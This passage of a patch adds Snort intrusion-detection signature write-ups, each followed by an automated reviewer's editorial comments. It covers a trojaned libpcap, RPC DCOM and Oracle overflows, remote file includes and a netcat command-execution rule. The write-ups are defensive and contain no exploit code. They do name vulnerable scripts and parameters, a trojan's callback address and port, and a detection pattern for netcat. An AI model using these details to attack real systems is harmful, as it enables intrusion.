+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck633.html
+
+--
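Review bot: the sentence "If you are running Oracle on a Windows server, make sure that the variable $ORACLE_PORTS is set to a value of "any"." is a Snort rule-configuration requirement, not information about the vulnerability, and belongs in its own configuration note (or under "Corrective Action:" as a detection prerequisite) with a sentence on why Windows deployments need it. "Detailed Information:" says the procedure assists replication while "Attack Scenarios:" names the "sname" and "oname" parameters; tie them together by stating which package "cancel_statistics" belongs to. Grammar: "a Oracle database" -> "an Oracle database", "logon to the database" -> "log on to the database"; the "Oracle 9i" entry is indented with spaces where other files use a tab.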
--- /dev/null
+++ b/doc/signatures/1929.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1929
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Trojan server installed via compromised tcpdump or libpcap sources.
+
+--
+Impact:
+Control of the victim host.
+
+--
+Detailed Information:
+This Trojan affects UNIX operating systems:
+
+Some versions of tcpdump and libpcap were compromised and Trojan code 
+inserted into the source. The compromise is similar to that which 
+affected OpenSSH.
+
+Libpcap is a library used for capturing packets in Snort and other 
+packet sniffing tools.
+
+The Trojaned libpcap source contains code in the configure script that 
+connects to a server at 212.146.0.34 on port 1963. The script then 
+downloads source code for a Trojan horse and compiles it.
+
+Tcpdump is a tool that is used for capturing network traffic, it 
+utilizes libpcap. Some versions of tcpdump also contain the same Trojan.
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan is delivered to the target via the configure script.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Delete the Trojan and kill any associated processes.
+
+Restore the system from known good backups.
+
+Download non-trojaned versions of the library and re-compile.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Houston Linux Users Group
+http://www.hlug.org/trojan/
+
+--
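Review bot: "Corrective Action:" says "Download non-trojaned versions of the library and re-compile." but, since the compromise was in the distributed source, it should also tell the reader to verify the downloaded tarball against the project's published checksums or signatures before building, and to inspect the configure script for the outbound connection described under "Detailed Information:". Style: "This Trojan affects UNIX operating systems:" ends in a colon but is not followed by a list; "Tcpdump is a tool that is used for capturing network traffic, it utilizes libpcap." is a comma splice; "None Known" -> "None known.".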
--- /dev/null
+++ b/doc/signatures/423.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+423
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Mobile Registration Request datagram.
+
+--
+
+Impact:
+ICMP Mobile Registration Requests were never implemented and have been replaced by UDP and TCP versions of the message.  ICMP Type 35 datagrams should never be seen in normal network conditions.
+
+--
+
+Detailed Information:
+ICMP Mobile Registration Request datagrams were developed before the development of RFC3344 (IP Mobility Support for IPv4).  Therefore these types of ICMP datagrams should never be seen in normal networking conditions.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 35 datagrams are not normal network activity.  Hosts generating these types of datagrams should be investigated for nefarious activity
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
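Review bot: "Attack Scenarios: None known" conflicts with "Ease of Attack: Numerous tools and scripts can generate this type of ICMP datagram."; either describe the scenario the rule is meant to catch (a host crafting Type 35 datagrams, as "Corrective Action:" implies) or mark Ease of Attack as not applicable. "Additional References: None" should at least cite RFC 3344, which the text already names. Style: "were developed before the development of RFC3344" is repetitive ("predate RFC 3344"); the Corrective Action sentence lacks a final period; the "Affected Systems:" section present in the other files is missing; the extra blank lines around each "--" separator differ from the rest of the patch.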
--- /dev/null
+++ b/doc/signatures/100000675.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000675
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "pfooter.php" using a remote file being passed as the 
+"theme_root" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "theme_root" parameter in the "pfooter.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
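Review bot: the third "Detailed Information:" paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. ...") is the generic credential-checking text copied into every remote-file-include entry in this patch and does not describe the "theme_root" include in "pfooter.php"; remove it. Fix "ona" -> "on a", "attackers choosing" -> "attacker's choosing", "has been attempted" -> "has been made", add the missing blank lines before the "--" separators after the Sid, Affected Systems and Contributors sections, and cite the advisory the rule is based on under "Additional References:".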
--- /dev/null
+++ b/doc/signatures/575.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+575
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) admind is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port admind is using.  Attackers can also learn what versions of the admind protocol are accepted by admind.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as admind run.  The admind RPC service is used by some UNIX hosts to perform remote distributed system administration tasks such as adding new users.  If weak authentication is used, it may be possible for a malicious user to perform remote administration.
+
+--
+Affected Systems:
+Any host running admind with weak authentication.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where admind runs.  This may be a precursor to accessing admind.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access admind, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for admind, not probes of the admind service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the admind service itself. An attacker may attempt to go directly to the admind port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids 
+http://www.whitehats.com/info/IDS18
+
+
+--
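Review bot: this entry is the clearest in the batch (the "False Negatives:" paragraph correctly explains that the rule sees only portmapper GETPORT probes, not direct connections to admind). Two small points: "Affected Systems: Any host running admind with weak authentication." understates the scope, since the rule fires on the GETPORT probe regardless of how admind is configured, so "Any host running admind" with the weak-authentication caveat as a second sentence reads better; and "Simple.  " under "Ease of Attack:" has trailing whitespace, as do several lines using double spaces after periods.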
--- /dev/null
+++ b/doc/signatures/2277.txt
@@ -0,0 +1,58 @@
+Rule:
+--
+Sid:
+2277
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a directory
+traversal vulnerability in the cgi application PeopleSoft PeopleBooks.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event may indicate an attempt is made to exploit a directory
+traversal vulnerability in the cgi application PeopleSoft PeopleBooks.
+The script psdoccgi.exe does not sufficiently check script arguements
+for the "headername" and "footername" variables. An attacker may exploit
+this issue to access files outside the root of the web server.
+
+--
+Affected Systems:
+	PeopleTools versions 8.43 and earlier.
+
+--
+Attack Scenarios:
+An attacker can use directory traversal techniques to access sensitive
+system files to gain information necessary for further system
+compromise.
+
+--
+Ease of Attack:
+Simple. No exploit code required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
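Review bot: "arguements" -> "arguments" in "The script psdoccgi.exe does not sufficiently check script arguements". "cgi application" should be "CGI application" as in the other files. "Additional References:" is empty although "Affected Systems:" pins the issue to "PeopleTools versions 8.43 and earlier", so the vendor or tracker reference that version range came from should be cited. Formatting: "Rule:" has no blank line before the first "--", unlike the other signature files.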
--- /dev/null
+++ b/doc/signatures/2199.txt
@@ -0,0 +1,58 @@
+Rule:  
+
+--
+Sid:
+2199
+
+--
+Summary:
+This event is generated when an attempt is made to access multidiff.cgi on an internal web server. This may indicate an attempt to exploit an information disclosure vulnerability in Mozilla Bonsai 1.3.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+Mozilla Bonsai, a CVS query tool, contains an information disclosure vulnerability in multidiff.cgi. An attacker can discover the location of the Mozilla Bonsai application by sending a malformed request to the application, which produces an error. The error message shows the full path of the multidiff.cgi file, providing the attacker with information about the server directory structure.
+
+--
+Affected Systems:
+Any system running Mozilla Bonsai 1.3.
+
+--
+Attack Scenarios:
+An attacker sends an erroneous request to multidiff.cgi on the Bonsai server. The error message returns the full path of the script, allowing the attacker to discover more information about the server directory structure for possible use in later attacks.
+
+--
+Ease of Attack:
+Simple. Proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses multidiff.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to a newer build of Mozilla Bonsai 1.3.
+
+If you are running Mozilla Bonsai on Debian 3.0, Debian has provided patches at http://security.debian.org/pool/updates/main/b/bonsai/.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/5517
+
+--
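Review bot: "Corrective Action: Upgrade to a newer build of Mozilla Bonsai 1.3." is ambiguous when "Affected Systems:" lists "Any system running Mozilla Bonsai 1.3."; state the first fixed build or date so readers can tell whether they are affected. Trailing whitespace on "Rule:  " and on the "-- " separator before "Additional References:".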
--- /dev/null
+++ b/doc/signatures/1088.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1088
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
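Review bot: "Affected Systems:" is empty; fill it in or state explicitly that any web, web application or FTP server that does not validate requested paths is affected, which is what "Detailed Information:" implies. "Attack Scenarios:" mentions only "the ftp root directory" while the Summary and Detailed Information cover web servers too. Style: "None known" without a period differs from the other files; "Rule:  " and "-- " carry trailing whitespace; "Additional References:" is empty.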
--- /dev/null
+++ b/doc/signatures/3297.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3297
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
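Review bot: "Attack Scenarios: An attacker may make a request for a file with an overly long filename via a network share." does not match the vulnerability described under "Detailed Information:" (a malformed DCOM request over RPC causing a buffer overflow); the scenario text looks copied from an SMB signature and should describe the RPC request instead. "Expoit code exists." -> "Exploit code exists.". "Additional References:" is empty for a widely documented Microsoft RPC DCOM issue; cite the vendor bulletin the rule was written from.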
--- /dev/null
+++ b/doc/signatures/1360.txt
@@ -0,0 +1,57 @@
+Rule: 
+
+--
+Sid: 1360
+
+-- 
+Summary:
+A web command execution attack involving the use of a
+"netcat" command
+
+-- 
+Impact: 
+Possible intelligence gathering activity or an attempt to gain elevated privileges on the server by using netcat to open another connection.
+
+-- 
+Detailed Information: 
+The attacker may have gained the ability to execute system commands remotely or the web server may be incorrectly configured to allow such access.
+
+This rule generates an event when a "netcat" command is used over a plain-text (unencrypted) connection on one of the specified web ports to the target web server. The "netcat" command may be used establish an interactive shell session to the machine and also transfer files over the connection.
+
+The rule looks for the "netcat" command in the client to web server network traffic and does not indicate whether the command was actually successful. The presence of the "netcat" command in the URI indicates that an attacker attempted to trick the web server into executing system in non-interactive mode i.e. without a valid shell session.
+
+Alternatively this rule may generate an event in an unencrypted HTTP tunneling connection to the server or a shell connection via another exploit against the web server.
+
+-- 
+Attack Scenarios: 
+An attacker uses a "netcat" command to move a rootkit to the system.
+
+--
+Ease of Attack: 
+Simple. No exploit software required
+
+-- 
+False Positives: 
+Any string containing 'nc' followed by space in the URL will trigger the alarm.
+
+--
+False Negatives: 
+none known
+
+-- 
+Corrective Action: 
+Check the web server software for vulnerabilities and possible upgrades or patches for the system to the latest version of the web software, also investigate the server logs for signs of compromise
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. Disallowing execution of this binary via a URI is suggested.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+
+--
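Review bot: "False Positives:" says "Any string containing 'nc' followed by space in the URL will trigger the alarm." while every other section talks about a "netcat" command; state which string the rule content actually matches, since that decides the false-positive rate ("nc " will appear in many legitimate URIs). Missing words: "may be used establish" -> "may be used to establish"; "trick the web server into executing system in non-interactive mode" -> "executing system commands in non-interactive mode". Also "outside of it's designated web root" -> "its"; "Sid: 1360" is on one line where other files put the number on its own line; "none known" -> "None known."; the "-- " separators have trailing whitespace.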
--- /dev/null
+++ b/doc/signatures/3252.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3252
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
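Review bot: 3252.txt is identical to 3297.txt earlier in this patch apart from the Sid, so the documentation gives no way to tell what distinguishes the two rules (different transport, different DCOM interface, or different request stage); each file should describe what its own rule matches. The same corrections apply: the network-share "overly long filename" scenario does not match the RPC DCOM overflow described in "Detailed Information:", "Expoit" -> "Exploit", and "Additional References:" is empty.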
--- /dev/null
+++ b/doc/signatures/100000626.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000626
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "message_edit.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"message_edit.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
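Review bot: the third paragraph of Detailed Information ("credentials of a client host connecting to the services offered on a host server") is boilerplate about authentication checks and does not describe the remote file include the Summary documents; drop it or replace it with a sentence on how the "admin_template_path" value ends up in an include. Also "running ona web server" should read "on a web server", "an exploitation attempt has been attempted" is redundant (suggest "may indicate an exploitation attempt"), and the "--" separators after Sid and Affected Systems lack the blank line the other entries use.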
--- /dev/null
+++ b/doc/signatures/2342.txt
@@ -0,0 +1,63 @@
+Rule:  
+
+--
+Sid:
+2342
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application DCP-Portal.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+DCP-Portal contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the variable root when 
+making a GET or POST  request  to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root by supplying
+their code in a file included from an external source by modifying the
+variable "root" in the editor.php script.
+
+--
+Affected Systems:
+	DCP-Portal 5.0.1
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path for the root variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <matthew.watchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
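Review bot: "usually root" in the second paragraph of Detailed Information overstates the impact; the included code runs with the privileges of the web server process, which on most deployments is an unprivileged account, so drop "usually root" and keep "the privileges of the user running the webserver". The Summary and Attack Scenarios never name the affected script, while the second paragraph names "editor.php" and the variable "root"; put the script name in the Summary so the entry can be found by it. Minor: doubled spaces in "GET or POST  request  to" and a trailing space on the "-- " separator before Additional References.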
--- /dev/null
+++ b/doc/signatures/2859.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2859
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_char
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
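Review bot: the sentence in Detailed Information breaks mid-sentence after the procedure name ("vulnerability in the procedure add_priority_char" / ". This procedure is included in"), which reads as a template field substituted without reflowing; join it into one sentence. "Oracle Oracle9i" under Affected Systems repeats the vendor name. The entry also does not say whether sys.dbms_repcat_conf can be reached without database credentials, which matters both for the "Simple" ease-of-attack rating and for triaging an alert from an authenticated session.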
--- /dev/null
+++ b/doc/signatures/100000148.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 
+100000148
+
+-- 
+Summary: 
+This event is generated when an attempt is made to perform a directory 
+traversal attack against a system running Barracuda Spam Firewall.
+
+-- 
+Impact: 
+Serious. Unauthorized remote command execution possibly leading to remote 
+access.
+
+--
+Detailed Information:
+User supplied data to script parameters are not properly sanitized, this may 
+permit an unauthorized attacker to execute commands of their choosing on an 
+affected system.
+
+Note:
+In order to utilize this rule, port 8000 must be added to the http_inspect 
+configuration in snort.conf.
+
+--
+Affected Systems:
+Barracuda Spam Firewall 3.1.17 and prior.
+
+--
+Attack Scenarios: 
+An attacker can supply commands as parameters to the img.pl script.
+
+-- 
+Ease of Attack: 
+Simple, exploit software exists but is not necessary.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+-- 
+Corrective Action: 
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
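Review bot: the Summary calls this a directory traversal attack, but Detailed Information and Attack Scenarios describe command injection ("supply commands as parameters to the img.pl script"); make the sections agree on which flaw the rule detects. The img.pl script is named only in Attack Scenarios and belongs in the Summary or Detailed Information. "User supplied data to script parameters are not properly sanitized, this may" is a comma splice ("...sanitized; this may..."). The note about adding port 8000 to the http_inspect configuration is exactly the deployment caveat the other entries in this patch lack and should stay.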
--- /dev/null
+++ b/doc/signatures/2845.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2845
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure register_snapshot_repgroup
+. This procedure is included in
+sys.dbms_repcat_sna_utl.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
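Review bot: same template defects as the 2859.txt entry: the mid-sentence break before ". This procedure is included in" after register_snapshot_repgroup, the repeated vendor name in "Oracle Oracle9i", and no statement of whether sys.dbms_repcat_sna_utl is callable without database credentials.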
--- /dev/null
+++ b/doc/signatures/100000605.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000605
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "inv_unpaid.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "inv_unpaid.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
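Review bot: apart from the script name ("inv_unpaid.php"), this entry duplicates 100000626.txt word for word, including the inapplicable credential-validation paragraph and the "ona" typo; if these entries come from a template, fix the template once rather than each copy. Since both rules key on the same "admin_template_path" parameter, Detailed Information should say what distinguishes them (presumably the script name) so an analyst seeing both alerts knows whether they are one request or two.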
--- /dev/null
+++ b/doc/signatures/1880.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1880
+
+--
